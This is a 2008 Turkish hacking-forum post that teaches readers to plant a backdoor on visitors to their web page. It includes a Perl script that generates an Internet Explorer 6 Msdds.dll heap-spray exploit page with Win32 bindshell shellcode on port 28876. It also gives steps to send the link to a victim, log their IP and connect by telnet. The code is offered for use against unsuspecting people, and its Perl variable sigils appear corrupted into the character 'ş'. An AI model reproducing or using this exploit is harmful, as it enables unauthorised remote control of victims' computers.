HOŞGELDİNİZ

--------------------------
 
AnasayfaAnasayfa  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Giriş yap  

Paylaş | 
 

 Web Sayfanıza Giren Kullanıcıya Trojan Yerleştirme

Aşağa gitmek 
YazarMesaj
By_deLycOcuq



Mesaj Sayısı : 22
Kayıt tarihi : 07/07/08

MesajKonu: Web Sayfanıza Giren Kullanıcıya Trojan Yerleştirme   Ptsi Tem. 07, 2008 11:16 pm

Internet Explorer kullanan ziyaretçilerinizin bilgisayarına Microsoft DTDS aracılığı
ile ActiveX kullanarak trojan yerleştirmeniz mümkün!

Internet Explorer 6 Windows XP SP1 ve SP2 sistemleri kullanan bilgisayarlarda
çalıştırabileceğiniz kod ile sitenize,sayfanıza giren kullanıcının bilgisayarına
bir arka kapı açabilir ve burdan bilgisayarına erişim sağlayabilirsiniz...

Ekteki dosyayı bilgisayarınıza kayıt edip web üzerinde herhangi bir sunucuya attıktan
sonra herhangi bir dosya adıyla değiştirerek bilgisayarına ulaşmak istediğiniz kişiye
linki gönderin ve ardından hemen Windows'ta çalıştıra girerek aşağıdaki komutu çalıştırın:

"Telnet ipadresi 28876"

Burada ipadresi sitenizi ziyaret eden kullanıcının ip adresi olacaktır. Bu adresi ufak bir
script yardımı ile loglayabilirsiniz...

28876 ise bilgisayara açılan arka kapının port numarasıdır .

Bağlantıyı sağladıktan sonra istediğinizi yapmakta özgürsünüz
Kod:
#!/usr/bin/perl
############################
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl file.pl > mypage.html
#
############################
#
# This program is free software; you can redistribute it and/or modify it
under
# the terms of the GNU General Public License version 2, 1991 as published
by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# <http://www.gnu.org/licenses/gpl.html>
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
############################

# header
my şheader = "< html>< body>\n< SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my şshellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";

# Memory
my şcode = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length< slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace< 0x40000) block =
block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i< 700;i++) memory[i] = block + shellcode;\n".
"< /SCRIPT>\n";

# Msdds.dll
my şclsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';

# footer
my şfooter = "< object classid=\"CLSID:".şclsid."\">< /object>< /body><
/html>\n".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "şheader şshellcode şcode şfooter";
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
Web Sayfanıza Giren Kullanıcıya Trojan Yerleştirme
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Kullanıcı Adı Değiştirme Formu
» sevgilim7bni 4x kullanımı

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
HOŞGELDİNİZ :: Hack & Dökümanlar :: Web Hack-
Buraya geçin: